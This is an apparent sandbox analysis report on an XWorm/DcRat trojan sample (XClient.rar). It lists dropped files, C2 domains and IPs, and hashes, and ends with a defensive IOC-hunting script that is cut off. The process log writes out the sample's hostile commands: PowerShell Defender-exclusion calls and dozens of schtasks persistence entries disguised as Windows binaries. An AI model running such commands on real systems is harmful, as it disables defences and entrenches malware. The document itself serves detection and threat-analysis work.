Malware Analysis Report

2024-10-10 12:54

Sample ID: 240531-epvlzsee6w
Target: XClient.rar
SHA256: fd3e6807f8eaed1b3ae4a229c6d17584f4985665973320342a2016b79e3ad87d
Tags: xworm dcrat execution infostealer persistence rat trojan
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: fd3e6807f8eaed1b3ae4a229c6d17584f4985665973320342a2016b79e3ad87d

Threat Level: Known bad

The file XClient.rar was found to be: Known bad.

Malicious Activity Summary

xworm dcrat execution infostealer persistence rat trojan

Xworm family

Process spawned unexpected child process

Detect Xworm Payload

Xworm

DcRat

DCRat payload

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Executes dropped EXE

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported: 2024-05-31 04:07

Signatures

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Xworm family

xworm

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-05-31 04:07
Reported: 2024-05-31 04:10
Platform: win11-20240508-en
Max time kernel: 147s
Max time network: 153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

Signatures

DcRat

rat infostealer dcrat
Description | Indicator | Process | Target | Count
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A | 16
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A | 32

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Process spawned unexpected child process

Description | Indicator | Process | Target | Count
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | 48

Xworm

trojan rat xworm

DCRat payload

rat
Description | Indicator | Process | Target | Count
N/A | N/A | N/A | N/A | 3

Downloads MZ/PE file

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\Expensive 3.1 = "C:\\Users\\Admin\\AppData\\Roaming\\Expensive 3.1.exe" | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Windows\SysWOW64\SMI\Manifests\29c1c3cc0f7685 | C:\SavesDllcommon\fontsaves.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\7a0fd90576e088 | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\7a0fd90576e088 | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Program Files\Windows NT\TableTextService\en-US\5b884080fd4f94 | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Program Files\Windows Media Player\Visualizations\explorer.exe | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Program Files\Windows Media Player\Visualizations\7a0fd90576e088 | C:\SavesDllcommon\fontsaves.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Migration\WTR\5940a34987c991 | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Windows\addins\csrss.exe | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Windows\addins\886983d96e3d3e | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Windows\ImmersiveControlPanel\pris\dllhost.exe | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Windows\ImmersiveControlPanel\pris\5940a34987c991 | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Windows\ServiceState\WinHttpAutoProxySvc\Data\winlogon.exe | C:\SavesDllcommon\fontsaves.exe | N/A
File created | C:\Windows\Migration\WTR\dllhost.exe | C:\SavesDllcommon\fontsaves.exe | N/A
File opened for modification | C:\Windows\Migration\WTR\dllhost.exe | C:\SavesDllcommon\fontsaves.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target | Count
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A | 48

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\uliqxd.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | C:\SavesDllcommon\fontsaves.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Count
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 8
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A | 1
N/A | N/A | C:\SavesDllcommon\fontsaves.exe | N/A | 11
N/A | N/A | C:\SavesDllcommon\System.exe | N/A | 9
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A | 1

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\SavesDllcommon\System.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target | Count
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 4
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\SavesDllcommon\fontsaves.exe | N/A | 1
Token: SeDebugPrivilege | N/A | C:\SavesDllcommon\System.exe | N/A | 1
Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A | 1
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A | 1

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Count
PID 568 wrote to memory of 4392 | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 2
PID 568 wrote to memory of 2452 | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 2
PID 568 wrote to memory of 4148 | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 2
PID 568 wrote to memory of 1768 | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 2
PID 568 wrote to memory of 5068 | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | C:\Users\Admin\AppData\Local\Temp\uliqxd.exe | 3
PID 5068 wrote to memory of 5088 | N/A | C:\Users\Admin\AppData\Local\Temp\uliqxd.exe | C:\Windows\SysWOW64\WScript.exe | 3
PID 5088 wrote to memory of 4360 | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\cmd.exe | 3
PID 4360 wrote to memory of 4000 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\SavesDllcommon\fontsaves.exe | 2
PID 4000 wrote to memory of 3552 | N/A | C:\SavesDllcommon\fontsaves.exe | C:\Windows\System32\cmd.exe | 2
PID 3552 wrote to memory of 4920 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\w32tm.exe | 2
PID 3552 wrote to memory of 3428 | N/A | C:\Windows\System32\cmd.exe | C:\SavesDllcommon\System.exe | 2
PID 3428 wrote to memory of 1284 | N/A | C:\SavesDllcommon\System.exe | C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe | 2

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Expensive 3.1.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Expensive 3.1.exe'

C:\Users\Admin\AppData\Local\Temp\uliqxd.exe

"C:\Users\Admin\AppData\Local\Temp\uliqxd.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\SavesDllcommon\gdNhr8l.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\SavesDllcommon\BRvogp3keJwY6M0FyR4uWbtTK.bat" "

C:\SavesDllcommon\fontsaves.exe

"C:\SavesDllcommon\fontsaves.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\SavesDllcommon\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\SavesDllcommon\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\SavesDllcommon\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Default User\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\SavesDllcommon\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\addins\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\SavesDllcommon\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\SavesDllcommon\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\SavesDllcommon\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "XClientX" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\XClient.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "XClient" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\XClient.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "XClientX" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\XClient.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6py5WUoJqb.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\SavesDllcommon\System.exe

"C:\SavesDllcommon\System.exe"

C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe

"C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004BC

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | loss-winners.gl.at.ply.gg | udp
US | 147.185.221.19:61007 | loss-winners.gl.at.ply.gg | tcp
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 147.185.221.19:61007 | loss-winners.gl.at.ply.gg | tcp
RU | 141.8.192.6:80 | a0987391.xsph.ru | tcp
RU | 141.8.192.6:80 | a0987391.xsph.ru | tcp
RU | 141.8.192.6:80 | a0987391.xsph.ru | tcp
US | 147.185.221.19:61007 | loss-winners.gl.at.ply.gg | tcp
US | 147.185.221.19:61007 | loss-winners.gl.at.ply.gg | tcp
RU | 141.8.192.6:80 | a0987391.xsph.ru | tcp

Files

memory/568-0-0x00007FFFAE693000-0x00007FFFAE695000-memory.dmp

memory/568-1-0x0000000000C50000-0x0000000000C68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4uidhoz.dzr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4392-10-0x000001191A880000-0x000001191A8A2000-memory.dmp

memory/4392-11-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/4392-13-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/4392-12-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/4392-14-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/4392-17-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/4392-18-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e8eb51096d6f6781456fef7df731d97
SHA1 ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 21017c68eaf9461301de459f4f07e888
SHA1 41ff30fc8446508d4c3407c79e798cf6eaa5bb73
SHA256 03b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888
SHA512 956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e0391d00f5bfbc34be70790f14d5edf
SHA1 fcb04d8599c23967de4f154a101be480933ab0d0
SHA256 1c0c0c86d7c736fc9fb148ac7cd6e67565dc5b76fa116ae3b000a79e91855136
SHA512 231b9cc6efb928f0748cef04f287d9204c4f7d2eb4bc27f345e9a1afc6d0675057978ca44d1a95334ee2380709aa6dbe74015fedff8f17611a64efcfb9f64d2a

memory/568-51-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uliqxd.exe

MD5 5841e08c36ee75ba2d4002507ceb9be8
SHA1 c679478e7041b2c3f0659403e87dc1bf011e7f2c
SHA256 85905bb938abe1ea461869f73103f364f2dddaae579f35d460338a21db8b8056
SHA512 2fdd014e5c128e7bb6112cc3facf50dd413dbb7d9e705d7c3b21dd0a9d4717281d1bdb62bf416ed1e651bea8177db3d3ae0b3ac6ba729e0eb9010e694d8d7744

C:\SavesDllcommon\gdNhr8l.vbe

MD5 67750c3e2cc7970484d8e1f3e95c4454
SHA1 b4a6e933dfda3db9a2663798f421a2b06a0c5b35
SHA256 a5c935975dff3bdbd1fd9c63abc8c47d2e24dd408dd5d0760b8af2db291c9655
SHA512 d794c9fdc99334fe3627d03e63e41d67a6f47e5b1601eb3c4c9cd037dd6b74c238e3bd8510c7755fd4e6f366b140bf9b82d6fbe734237ee8d44de51a193c1fa9

C:\SavesDllcommon\BRvogp3keJwY6M0FyR4uWbtTK.bat

MD5 0a9ef172b5e9daeb9c3366842676eac9
SHA1 18ce47e6f7a7dc2a4c0882a7fa1e69bc91f22cd2
SHA256 4193c6cb4fcc0e633a062825fc4b510d826d68063be74cf7f37d5db3a75ea2b6
SHA512 dc1985d420f4d7058529acd1afce2bd9e047f95074a3f12ca0923903bb3dab615fb938464d6a75adfd4a890aa3eeda9797c13bfb867bb02e02945af3c108d563

C:\SavesDllcommon\fontsaves.exe

MD5 73ace1b8b0f1b1c088f11ee29b13ae6b
SHA1 4b7fa04aacb5a23ab37b9caaee8f852a1bd33bbc
SHA256 8be76a2960a823f9284836868172eff28b64de44daba8b09f91ff678bb22d614
SHA512 1e13cc8ac20c9e10cd13f78cb54e75b23ad255d1601d45ee78770f3cb74fe5e9bb3e84d8ca8f7c44659365da45a79b72be85d6433a8bbbac79b925839cc7e4d1

memory/4000-72-0x00000000007D0000-0x0000000000902000-memory.dmp

memory/4000-73-0x000000001B5A0000-0x000000001B5BC000-memory.dmp

memory/4000-75-0x000000001B5C0000-0x000000001B5D6000-memory.dmp

memory/4000-74-0x000000001B610000-0x000000001B660000-memory.dmp

memory/4000-76-0x0000000002A50000-0x0000000002A5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6py5WUoJqb.bat

MD5 6427be0302c789764be5d54f7e002a0a
SHA1 ac7f0dc923bea68b72d321b4770e5d70eaa8c9e2
SHA256 ec42526166d1e5aa74bd6015cb52224f553a437f39c36516a1f1d79340d02b19
SHA512 5eefe384774b8b754e9428aed6fdfcf8649c0b5204d67798fa3f0cebd09a143eae2e5e4accdb168db53c370042faeb488b191b2b3a68b52a25e1b8f155fdb620

memory/568-115-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/568-119-0x0000000002DA0000-0x0000000002DAC000-memory.dmp

memory/3428-120-0x000000001BE90000-0x000000001BED6000-memory.dmp

memory/3428-122-0x000000001BF10000-0x000000001BF1D000-memory.dmp

memory/3428-121-0x000000001BEE0000-0x000000001BEE9000-memory.dmp

memory/3428-123-0x000000001C440000-0x000000001C45E000-memory.dmp

memory/3428-124-0x000000001BF20000-0x000000001BF2B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe

MD5 137c1b0243beb35b6a0b6dbe632dc341
SHA1 b710da533d9a33f4d7fc78d317bbcee8dc95826d
SHA256 86cd8a8dc5228014e559788e7a0f5ed6fef637691bf53111e9eab4187a0652ab
SHA512 49ee75b71223ed47ae81a089247ff3002d50f70ede8e57af42f73745bbf7cb8ee7c71c1ab5da9d967fbe0b2f9de5dad70f4a7f4cfe44ba104d5a60be53eccabf

memory/1284-171-0x000001586BCF0000-0x000001586C0B4000-memory.dmp

memory/568-177-0x0000000001540000-0x000000000154C000-memory.dmp

memory/1284-181-0x000001586E880000-0x000001586E89E000-memory.dmp

memory/1284-182-0x000001586E8A0000-0x000001586E8AB000-memory.dmp

memory/1284-180-0x000001586E870000-0x000001586E87D000-memory.dmp

memory/1284-179-0x000001586DD50000-0x000001586DD59000-memory.dmp

memory/1284-178-0x000001586E690000-0x000001586E6D6000-memory.dmp
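
Turning the three sections above into a hunt over endpoint telemetry, as an added example that is not part of the sandbox report: the Processes section shows cmd.exe running a .bat from Temp, spawning w32tm /stripchart against localhost and then C:\SavesDllcommon\System.exe; the Network section gives the C2 domains and IP:port pairs; the Files section gives the dropped-file hashes. The script below checks constructed Sysmon-style process, network and file-hash records against those indicators. Assumptions: the event schema (pid/ppid/image/cmdline, domain/dst_ip/dst_port, path/sha256) is invented for the example; the pids are illustrative, not the sandbox's; reading w32tm /stripchart /computer:localhost as a delay is the editor's interpretation, since the report only lists the command; and the PowerShell policy-test, CLR usage-log and StartupProfileData files are left out of hash matching because their contents vary per host.

```python
"""Hunt for the XClient drop chain and the IOCs listed in this report.

Added example, not code from the sandbox report. Indicators are copied from
the Processes, Network and Files sections; all event records are constructed
to resemble Sysmon-style telemetry and their pids are not the sandbox's.
"""
from collections import defaultdict

# --- indicators taken from the report -------------------------------------
C2_DOMAINS = {"loss-winners.gl.at.ply.gg", "a0987391.xsph.ru"}
C2_ENDPOINTS = {("147.185.221.19", 61007), ("141.8.192.6", 80)}
STAGING_DIR = r"c:\savesdllcommon"  # compared lower-cased
DROPPED_SHA256 = {  # dropped payloads only; PowerShell/CLR side-files vary per host
    "85905bb938abe1ea461869f73103f364f2dddaae579f35d460338a21db8b8056",  # uliqxd.exe
    "a5c935975dff3bdbd1fd9c63abc8c47d2e24dd408dd5d0760b8af2db291c9655",  # gdNhr8l.vbe
    "4193c6cb4fcc0e633a062825fc4b510d826d68063be74cf7f37d5db3a75ea2b6",  # BRvogp3keJwY6M0FyR4uWbtTK.bat
    "8be76a2960a823f9284836868172eff28b64de44daba8b09f91ff678bb22d614",  # fontsaves.exe
    "ec42526166d1e5aa74bd6015cb52224f553a437f39c36516a1f1d79340d02b19",  # 6py5WUoJqb.bat
    "86cd8a8dc5228014e559788e7a0f5ed6fef637691bf53111e9eab4187a0652ab",  # Meatspin_FULL.exe
}
# Roots from which an EXE child of a batch script is unremarkable (assumed list).
BENIGN_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


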